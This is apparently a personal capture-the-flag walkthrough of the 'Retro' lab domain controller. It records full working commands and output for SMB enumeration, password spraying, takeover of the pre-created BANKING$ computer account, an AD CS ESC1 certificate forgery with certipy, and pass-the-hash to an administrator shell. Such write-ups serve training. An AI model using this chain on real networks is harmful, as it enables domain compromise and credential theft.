Here is my notes on RETRO box from Vulnlab which deployed to Hackthebox from yesterday.
RETRO: 10.10.80.215
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
135/tcp open msrpc Microsoft Windows RPC
┌──(root㉿kali)-[/home/kali/BOXES/COMP/RETRO]
└─# sudo impacket-rpcdump @10.10.80.215 | egrep 'MS-RPRN|MS-PAR'
Protocol: [MS-RPRN]: Print System Remote Protocol
Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol
result was NT_STATUS_ACCESS_DENIED
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
┌──(root㉿kali)-[/home/kali/BOXES/COMP/RETRO]
└─# smbclient -N -L 10.10.80.215
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC - Anonymous Access
NETLOGON Disk Logon server share
Notes Disk Access-Denied
SYSVOL Disk Logon server share
Trainees Disk Anonymous Access
┌──(root㉿kali)-[/home/kali/BOXES/COMP/RETRO]
└─# smbclient \\\\10.10.80.215\\Trainees -U ""
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 23 17:58:43 2023
.. DHS 0 Wed Jul 26 05:54:14 2023
Important.txt A 288 Sun Jul 23 18:00:13 2023
6261499 blocks of size 4096. 2186444 blocks available
smb: \> get "Important.txt"
getting file \Important.txt of size 288 as Important.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/kali/BOXES/COMP/RETRO]
└─# cat Important.txt
Dear Trainees,
I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.
Regards
The Admins
IPC$ Enumeration:
┌──(root㉿kali)-[/home/kali/BOXES/COMP/RETRO]
└─# cat users.txt
Administrator
Guest
krbtgt
DC$
trainee
BANKING$
jburley
tblack
crackmapexec smb 10.10.80.215 -u users.txt -p users.txt --continue-on-success #Crack based on important.txt.
SMB 10.10.80.215 445 DC [+] retro.vl\trainee:trainee #The only one that works.
┌──(root㉿kali)-[/home/…/BOXES/COMP/RETRO/Important]
└─# crackmapexec smb 10.10.80.215 -u trainee -p trainee --shares
SMB 10.10.80.215 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.80.215 445 DC [+] retro.vl\trainee:trainee
SMB 10.10.80.215 445 DC [+] Enumerated shares
SMB 10.10.80.215 445 DC Share Permissions Remark
SMB 10.10.80.215 445 DC ----- ----------- ------
SMB 10.10.80.215 445 DC ADMIN$ Remote Admin
SMB 10.10.80.215 445 DC C$ Default share
SMB 10.10.80.215 445 DC IPC$ READ Remote IPC
SMB 10.10.80.215 445 DC NETLOGON READ Logon server share
SMB 10.10.80.215 445 DC Notes READ
SMB 10.10.80.215 445 DC SYSVOL READ Logon server share
SMB 10.10.80.215 445 DC Trainees READ
┌──(root㉿kali)-[/home/…/BOXES/COMP/RETRO/Important]
└─# smbclient \\\\10.10.80.215\\Notes -U "trainee"
Password for [WORKGROUP\trainee]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 23 18:03:16 2023
.. DHS 0 Wed Jul 26 05:54:14 2023
ToDo.txt A 248 Sun Jul 23 18:05:56 2023
6261499 blocks of size 4096. 2184874 blocks available
smb: \> get ToDo.txt
getting file \ToDo.txt of size 248 as ToDo.txt (0.5 KiloBytes/sec) (average 0.5 KiloBytes/sec)
smb: \> exit
┌──(root㉿kali)-[/home/…/BOXES/COMP/RETRO/Important]
└─# cat ToDo.txt
Thomas,
after convincing the finance department to get rid of their ancienct banking software
it is finally time to clean up the mess they made. We should start with the pre created
computer account. That one is older than me.
Best
James
-No Kerberoasting and Asreproasting.
┌──(root㉿kali)-[/home/…/BOXES/COMP/RETRO/Important]
└─# crackmapexec smb 10.10.80.215 -u BANKING$ -p banking
SMB 10.10.80.215 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.80.215 445 DC [-] retro.vl\BANKING$:banking STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT
BANKING$ is a pre-created computer account.
pre-created computer account Notes:
https://trustedsec.com/blog/diving-into-pre-created-computer-accounts
https://www.optiv.com/insights/source-zero/blog/diving-deeper-pre-created-computer-accounts
https://github.com/garrettfoster13/pre2k
https://ppn.snovvcrash.rocks/pentest/infrastructure/ad/pre-created-computers-abuse
https://www.thehacker.recipes/ad/movement/domain-settings/pre-windows-2000-computers
┌──(root㉿kali)-[/home/kali/BOXES/COMP/RETRO]
└─# pre2k auth -u trainee -p trainee -d retro.vl -dc-ip 10.10.80.215 -verbose
___ __
/'___`\ /\ \
_____ _ __ __ /\_\ /\ \\ \ \/'\
/\ '__`\/\`'__\/'__`\ _______\/_/// /__\ \ , <
\ \ \L\ \ \ \//\ __//\______\ // /_\ \\ \ \\`\
\ \ ,__/\ \_\\ \____\/______/ /\______/ \ \_\ \_\
\ \ \/ \/_/ \/____/ \/_____/ \/_/\/_/
\ \_\ v3.0
\/_/
@garrfoster
@Tw1sm
[15:09:51] INFO Retrieved 2 results total.
[15:09:51] INFO Testing started at 2023-12-26 15:09:51
[15:09:51] INFO Using 10 threads
[15:09:51] INFO VALID CREDENTIALS: retro.vl\BANKING$:banking
[15:09:51] DEBUG Invalid credentials: retro.vl\DC$:dc
Password Change for “NT_STATUS_NOLOGON_WORKSTATION_TRUST_ACCOUNT”:
┌──(root㉿kali)-[/home/…/BOXES/COMP/RETRO/Important]
└─# cat /etc/krb5.conf
[libdefaults]
default_realm = RETRO.VL
dns_lookup_realm = false
ticket_lifetime = 24h
renew_lifetime = 7d
rdns = false
kdc_timesync = 1
ccache_type = 4
forwardable = true
proxiable = true
[realms]
RETRO.VL = {
kdc = DC.RETRO.VL
admin_server = DC.RETRO.VL
}
┌──(root㉿kali)-[/home/…/BOXES/COMP/RETRO/Important]
└─# kpasswd BANKING$
Password for BANKING$@RETRO.VL:
Enter new password:
Enter it again:
Password changed.
┌──(root㉿kali)-[/home/…/BOXES/COMP/RETRO/Important]
└─# crackmapexec smb 10.10.80.215 -u BANKING$ -p 123
SMB 10.10.80.215 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB 10.10.80.215 445 DC [+] retro.vl\BANKING$:123
certipy find -vulnerable -stdout -u 'BANKING$@retro.vl' -p 123 -dc-ip 10.10.80.215
CA Name : retro-DC-CA
DNS Name : DC.retro.vl
[!] Vulnerabilities
ESC1 : 'RETRO.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
certipy req -username 'BANKING$@retro.vl' -password 123 -ca retro-DC-CA -target dc.retro.vl -template 'RetroClients' -upn 'administrator@retro.vl' -dns dc.retro.vl -key-size 4096 -debug
certipy req -u 'banking$'@retro.vl -p 'hacker@123' -c 'retro-DC-CA' -target 'dc.retro.vl' -template 'RetroClients' -upn 'administrator@retro.vl' -dns 'dc.retro.vl' -key-size 4096 -debug
┌──(root㉿kali)-[/home/…/BOXES/COMP/RETRO/Important]
└─# sudo certipy auth -pfx administrator_dc.pfx -dc-ip 10.10.80.215
Certipy v4.7.0 - by Oliver Lyak (ly4k)
[*] Found multiple identifications in certificate
[*] Please select one:
[0] UPN: 'administrator@retro.vl'
[1] DNS Host Name: 'dc.retro.vl'
> 0
[*] Using principal: administrator@retro.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@retro.vl': aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389
sudo secretsdump.py -hashes 'aad3b435b51404eeaad3b435b51404ee:252fac7066d93dd009d4fd2cd0368389' -no-pass retro.vl/'administrator'@dc.retro.vl
evil-winrm -i dc.retro.vl -u Administrator -H '252fac7066d93dd009d4fd2cd0368389' - Administrator SHELL !
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
ldap Version 3 - Access-Denied
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after: 2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2023-12-25T19:05:19
|_Not valid after: 2024-06-25T19:05:19
| rdp-ntlm-info:
| Target_Name: RETRO
| NetBIOS_Domain_Name: RETRO
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: retro.vl
| DNS_Computer_Name: DC.retro.vl
| Product_Version: 10.0.20348
|_ System_Time: 2023-12-26T19:11:26+00:00
|_ssl-date: 2023-12-26T19:12:05+00:00; 0s from scanner time.
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49712/tcp open msrpc Microsoft Windows RPC
49715/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
ROOT.TXT: VL{REDIRECTED}